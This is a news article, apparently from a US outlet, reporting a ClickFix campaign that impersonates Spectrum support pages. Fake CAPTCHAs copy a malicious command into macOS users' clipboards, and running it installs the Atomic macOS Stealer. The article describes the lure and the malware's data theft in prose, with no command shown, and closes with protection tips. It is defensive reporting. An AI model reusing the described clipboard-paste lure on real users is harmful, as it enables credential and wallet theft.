FOLLOW US

ClickFix, a growing social engineering threat that first surfaced in early 2024, is now targeting macOS users in a newly discovered campaign that delivers Atomic macOS Stealer (AMOS)—a potent piece of malware capable of harvesting sensitive data from Apple systems.

Evolving Tactics: From Windows to macOS

Previously seen exploiting Windows users through fake CAPTCHA prompts, ClickFix tricks individuals into unwittingly installing malware by copying and running malicious commands. Now, researchers at CloudSEK have found that the same tactic has been adapted for Apple devices.

In this latest campaign, attackers impersonate Spectrum, a well-known U.S. telecom provider. Victims are lured to fraudulent support websites which closely mimic real Spectrum domains. Once on the site, users encounter what appears to be a legitimate CAPTCHA verification.

After “failing” the CAPTCHA, they are prompted to try an "Alternative Verification." This process secretly copies a malicious shell command to the user's clipboard, instructing them to paste it into macOS Terminal—effectively installing the malware themselves.

"It's a textbook example of social engineering," Cloudsek analysts wrote.

"The attacker doesn't break in-they trick the user into opening the door.

What the Malware Does

Once executed, the script asks for the system password, disables security features, and downloads AMOS, which is designed to:

• Harvest passwords

• Steal cryptocurrency wallet keys

• Extract browser autofill data

• Access saved cookies

Researchers believe the campaign originates from Russian-speaking actors, based on linguistic traces within the code and errors such as Linux users receiving Windows-specific commands.

A Growing Trend in Cybercrime

ClickFix represents a new wave of cyberattacks where users become the delivery mechanism. It eliminates the need for complex exploits or software vulnerabilities by instead relying on human trust and habit.

In earlier campaigns, the same tactic was used to deliver PowerShell-based malware to Windows users. By November 2024, ClickFix had evolved further to target Google Meet users via phishing emails that mimicked internal corporate invites and redirected to spoofed Google Meet pages.

https://usaherald.com/time-traveling-hackers-fbi-and-kurt-the-cyberguy-warn-of-new-cyberattack/

How to Protect Against ClickFix

To safeguard against threats like ClickFix, follow these essential tips:

1. Beware of CAPTCHA prompts: Real CAPTCHA tests never ask for Terminal or Command Prompt input.

2. Avoid clicking unknown links: Especially in emails that appear to come from trusted sources like Google or Booking.com.

3. Use strong antivirus software: Ensure real-time protection and phishing detection on all devices.

4. Enable two-factor authentication: Adds an extra layer of security beyond passwords.

5. Keep software up to date: Vulnerabilities in outdated systems are prime targets for malware.

6. Monitor accounts and use a password manager: Look for unusual activity and use complex, unique passwords.

7. Consider a personal data removal service: These services help monitor and scrub personal information from data broker sites.

"As long as instructions look like they're part of the regular user experience, people will keep falling for it," security expert "Kurt the Cyberguy" warned. "Even savvy users are vulnerable if they're not skeptical."

Conclusion

ClickFix exploits trust and routine behavior in the digital world. With its deceptively simple tactics and rapid evolution, it underscores the need for greater cyber hygiene and vigilance, especially among macOS users who have long assumed they're safer by default.

For further updates and tools to combat these threats, visit the CyberGuy Report.